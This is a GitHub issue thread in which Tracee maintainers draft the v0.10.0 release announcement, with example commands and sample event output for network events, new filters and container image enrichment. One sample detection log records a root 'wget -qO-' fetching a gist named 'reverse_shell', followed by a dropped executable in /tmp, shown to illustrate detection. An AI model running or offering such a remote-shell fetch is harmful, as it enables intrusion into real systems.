Prepare for v0.10.0

[josedonizetti]

Draft to collaborate on v0.10.0 release announcement

🚀 What's new? 🚀

🌐 Network events

Tracee now supports network events without the need to specify a network interface AND full network packets headers parsing. All data in & out from monitored tasks are captured as events named:

• net_packet_ipv4
• net_packet_ipv6
• net_packet_tcp
• net_packet_udp
• net_packet_icmp
• net_packet_icmpv6
• net_packet_dns
• net_packet_dns_request (backward compatibility with dns_request),
• net_packet_dns_response (backward compatibility with dns_response)

For example, to see IP and ICMP packets being sent to Google DNS servers, from the ping command, you may trace the net_packet_ipv4 and net_packet_icmp packets, and filter through net_packet_ipv4.args.dst= argument:

tracee-ebpf --output format:json --output option:parse-arguments --trace comm=ping --trace event=net_packet_ipv4,net_packet_icmp --trace net_packet_ipv4.args.dst=8.8.8.8

{"timestamp":1670957215423298783,"threadStartTime":258163110991849,"processorId":11,"processId":1253017,"cgroupId":13411,"threadId":1253017,"parentProcessId":929289,"hostProcessId":1253017,"hostThreadId":1253017,"hostParentProcessId":929289,"userId":1000,"mountNamespace":4026531841,"pidNamespace":4026531836,"processName":"ping","hostName":"fujitsu","containerId":"","containerImage":"","containerName":"","podName":"","podNamespace":"","podUID":"","eventId":"2007","eventName":"net_packet_ipv4","argsNum":3,"returnValue":0,"stackAddresses":[0],"contextFlags":{"containerStarted":false},"args":[{"name":"src","type":"const char*","value":"192.168.100.2"},{"name":"dst","type":"const char*","value":"8.8.8.8"},{"name":"proto_ipv4","type":"trace.ProtoIPv4","value":{"version":4,"IHL":5,"TOS":0,"length":84,"id":42551,"flags":2,"fragOffset":0,"TTL":64,"protocol":"ICMPv4","checksum":24503,"srcIP":"192.168.100.2","dstIP":"8.8.8.8"}}]}
{"timestamp":1670957215423298783,"threadStartTime":258163110991849,"processorId":11,"processId":1253017,"cgroupId":13411,"threadId":1253017,"parentProcessId":929289,"hostProcessId":1253017,"hostThreadId":1253017,"hostParentProcessId":929289,"userId":1000,"mountNamespace":4026531841,"pidNamespace":4026531836,"processName":"ping","hostName":"fujitsu","containerId":"","containerImage":"","containerName":"","podName":"","podNamespace":"","podUID":"","eventId":"2011","eventName":"net_packet_icmp","argsNum":3,"returnValue":0,"stackAddresses":[0],"contextFlags":{"containerStarted":false},"args":[{"name":"src","type":"const char*","value":"192.168.100.2"},{"name":"dst","type":"const char*","value":"8.8.8.8"},{"name":"proto_icmp","type":"trace.ProtoICMP","value":{"typeCode":"EchoRequest","checksum":28565,"id":18421,"seq":1}}]}
{"timestamp":1670957215433475341,"threadStartTime":258163110991849,"processorId":11,"processId":1253017,"cgroupId":13411,"threadId":1253017,"parentProcessId":929289,"hostProcessId":1253017,"hostThreadId":1253017,"hostParentProcessId":929289,"userId":1000,"mountNamespace":4026531841,"pidNamespace":4026531836,"processName":"ping","hostName":"fujitsu","containerId":"","containerImage":"","containerName":"","podName":"","podNamespace":"","podUID":"","eventId":"2011","eventName":"net_packet_icmp","argsNum":3,"returnValue":0,"stackAddresses":[0],"contextFlags":{"containerStarted":false},"args":[{"name":"src","type":"const char*","value":"8.8.8.8"},{"name":"dst","type":"const char*","value":"192.168.100.2"},{"name":"proto_icmp","type":"trace.ProtoICMP","value":{"typeCode":"EchoReply","checksum":30613,"id":18421,"seq":1}}]}
{"timestamp":1670957216424706460,"threadStartTime":258163110991849,"processorId":11,"processId":1253017,"cgroupId":13411,"threadId":1253017,"parentProcessId":929289,"hostProcessId":1253017,"hostThreadId":1253017,"hostParentProcessId":929289,"userId":1000,"mountNamespace":4026531841,"pidNamespace":4026531836,"processName":"ping","hostName":"fujitsu","containerId":"","containerImage":"","containerName":"","podName":"","podNamespace":"","podUID":"","eventId":"2007","eventName":"net_packet_ipv4","argsNum":3,"returnValue":0,"stackAddresses":[0],"contextFlags":{"containerStarted":false},"args":[{"name":"src","type":"const char*","value":"192.168.100.2"},{"name":"dst","type":"const char*","value":"8.8.8.8"},{"name":"proto_ipv4","type":"trace.ProtoIPv4","value":{"version":4,"IHL":5,"TOS":0,"length":84,"id":42772,"flags":2,"fragOffset":0,"TTL":64,"protocol":"ICMPv4","checksum":24282,"srcIP":"192.168.100.2","dstIP":"8.8.8.8"}}]}
{"timestamp":1670957216424706460,"threadStartTime":258163110991849,"processorId":11,"processId":1253017,"cgroupId":13411,"threadId":1253017,"parentProcessId":929289,"hostProcessId":1253017,"hostThreadId":1253017,"hostParentProcessId":929289,"userId":1000,"mountNamespace":4026531841,"pidNamespace":4026531836,"processName":"ping","hostName":"fujitsu","containerId":"","containerImage":"","containerName":"","podName":"","podNamespace":"","podUID":"","eventId":"2011","eventName":"net_packet_icmp","argsNum":3,"returnValue":0,"stackAddresses":[0],"contextFlags":{"containerStarted":false},"args":[{"name":"src","type":"const char*","value":"192.168.100.2"},{"name":"dst","type":"const char*","value":"8.8.8.8"},{"name":"proto_icmp","type":"trace.ProtoICMP","value":{"typeCode":"EchoRequest","checksum":2959,"id":18421,"seq":2}}]}
{"timestamp":1670957216434639616,"threadStartTime":258163110991849,"processorId":11,"processId":1253017,"cgroupId":13411,"threadId":1253017,"parentProcessId":929289,"hostProcessId":1253017,"hostThreadId":1253017,"hostParentProcessId":929289,"userId":1000,"mountNamespace":4026531841,"pidNamespace":4026531836,"processName":"ping","hostName":"fujitsu","containerId":"","containerImage":"","containerName":"","podName":"","podNamespace":"","podUID":"","eventId":"2011","eventName":"net_packet_icmp","argsNum":3,"returnValue":0,"stackAddresses":[0],"contextFlags":{"containerStarted":false},"args":[{"name":"src","type":"const char*","value":"8.8.8.8"},{"name":"dst","type":"const char*","value":"192.168.100.2"},{"name":"proto_icmp","type":"trace.ProtoICMP","value":{"typeCode":"EchoReply","checksum":5007,"id":18421,"seq":2}}]}

🗒 NOTE: learn how to write a signature for these events by checking tests/e2e-net-rules directory.

🧪 Everything is an event

Tracee collector powers (tracee-ebpf) and tracee rule engine (tracee-rules) are now part of a single experience, as one binary.

This allows for the collection of events to run along the rule engine, for example, see all execve along with the dropped_binary rule.

tracee --trace event=execve,dropped_binary

TIME             CONTAINER_ID  UID    COMM      PID/host     TID/host     RET       EVENT            ARGS
20:04:25:935736  7c9140b703bb  0      bash      2484/359031  2484/359031  0     execve               pathname: /usr/bin/wget, argv: [wget -qO- https://gist.githubusercontent.com/idanr1986/bad5bacff59cf002603c14c3e21a5404/raw/c356c1bc19d41587404f6750cd1f2e6e24dc2ad4/reverse_shell]
20:04:26:274547  7c9140b703bb  0      base64    2485/359032  2485/359032  4096  dropped_executable   pathname: /tmp/php-shared

⚠️ EXPERIMENTAL: Everything is an event is still experimental. This feature might change without preserving backward compatibility.

🔎 New filtering features

1. Context Filter

Tracee can now filter according to the internal context of a specific event:

tracee-ebpf -t e=sched_proc* -t sched_process_exec.context.processName=cat -t sched_process_exit.context.processName=runc -t sched_process_fork.context.processName=calico-node
TIME             UID    COMM             PID     TID     RET              EVENT                ARGS
12:37:25:878496  1000   cat              397138  397138  0                sched_process_exec   cmdpath: /usr/bin/cat, pathname: /usr/bin/cat, dev: 271581185, inode: 1567, ctime: 1662962793538399953, inode_mode: 33261, interpreter_pathname: /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2, interpreter_dev: 271581185, interpreter_inode: 4976, interpreter_ctime: 1662962793798402210, argv: [cat /proc/295465/stat], interp: /usr/bin/cat, stdin_type: S_IFSOCK, stdin_path: UNIX-STREAM, invoked_from_kernel: 0
12:37:26:112046  0      runc             397143  397147  0                sched_process_exit   exit_code: 0, process_group_exit: false
12:37:26:112662  0      calico-node      558200  558200  0                sched_process_fork   parent_tid: 397152, parent_ns_tid: 558200, parent_pid: 397152, parent_ns_pid: 558200, child_tid: 397158, child_ns_tid: 558206, child_pid: 397152, child_ns_pid: 558200, start_time: 1670935046112651896

🚧 BREAKING CHANGE: Argument filters are now written with a .args for example:

tracee-ebpf -t security_file_open.args.pathname=*Readme.md -t e=security_file_open
TIME             UID    COMM             PID     TID     RET              EVENT                ARGS
12:39:00:680778  1000   cat              399285  399285  0                security_file_open   pathname: /home/ubuntu/tracee/Readme.md, flags: O_RDONLY|O_LARGEFILE, dev: 271581185, inode: 258319, ctime: 1670858844757228575, syscall_pathname: Readme.md

2. Syscall filters

Events with a syscall argument now support using named syscalls as inputs.

tracee-ebpf -t security_file_open.args.syscall=execve -o option:detect-syscall -t e=security_file_open
TIME             UID    COMM             PID     TID     RET              EVENT                ARGS
12:39:22:176785  0      python3          399776  399776  0                security_file_open   pathname: /usr/bin/bash, flags: O_RDONLY|O_LARGEFILE, dev: 271581185, inode: 1631, ctime: 1662962793542399987, syscall_pathname: , syscall: execve

🗒 NOTE: tracee must be ran with -o option:detect-syscall for the filter to function.

3. Binary path filter

Tracee can now filter for events coming from a specific binary path:

tracee-ebpf -t binary=/usr/bin/ls -t e=sched_process_exec
TIME             UID    COMM             PID     TID     RET              EVENT                ARGS
18:40:09:169165  1000   ls               24607   24607   0                sched_process_exec   cmdpath: /usr/bin/ls, pathname: /usr/bin/ls, dev: 266338304, inode: 3670953, ctime: 1669563867153282494, inode_mode: 33261, argv: [ls --color=auto], interp: /usr/bin/ls, stdin_type: S_IFCHR, stdin_path: /dev/pts/1, invoked_from_kernel: 0

🗒 NOTE: Given path must be of an ELF binary, meaning that providing the path of a symbolic link won't work.

🐳 Container image in output

When using the containers enrichment feature while tracing container events, the container's image will be added to the output.

tracee-ebpf --trace c --containers
TIME             CONTAINER_ID  IMAGE            UID    COMM             PID/host        TID/host        RET              EVENT                ARGS
14:25:12:752785  83779dba171d  redis:latest     0      docker-entrypoi  1      /3543    1      /3543    0                sched_process_exec   cmdpath: /usr/local/bin/docker-entrypoint.sh, pathname: /bin/dash, dev: 41, inode: 6452858, ctime: 1671027908182212884, inode_mode: 33261, argv: [/bin/sh /usr/local/bin/docker-entrypoint.sh redis-server], interp: /bin/sh, stdin_type: S_IFCHR, stdin_path: /dev/null, invoked_from_kernel: 0
14:25:12:752941  83779dba171d  redis:latest     0      docker-entrypoi  1      /3543    1      /3543    -2               access               pathname: /etc/ld.so.preload, mode: R_OK
14:25:12:753015  83779dba171d  redis:latest     0      docker-entrypoi  1      /3543    1      /3543    0                cap_capable          cap: CAP_SYS_ADMIN

[NDStrahilevitz]

New filtering features

Context Filter

Tracee can now filter according to the internal context of a specific event:

BREAKING CHANGE: Argument filters are now written with a .args for example:

Syscall filters

Events with a syscall argument now support using named syscalls as inputs.

Note: tracee must be ran with -o option:detect-syscall for the filter to function.

[josedonizetti]

@NDStrahilevitz you not able to edit the first post? The idea is to have only one with a section per feature. Also, can you add some emojis to the title section?

[NDStrahilevitz]

Oh I didn't get that was the intention.
Let me fix that.

[itaysk]

@josedonizetti for "everything is event" thing - I think we should explain the motivation and changes in detail, but probably not here. I would suggest starting a GH Discussion (under "development"), that explain all this, and then this changelog can mention the changes in high level and link to the discussion for more info. We could also use the discussion to mention this change in the OSS team monthly update, and also as a way to collect feedback about the concept from community. WDYT?

[josedonizetti]

okay! i'll start to draft it.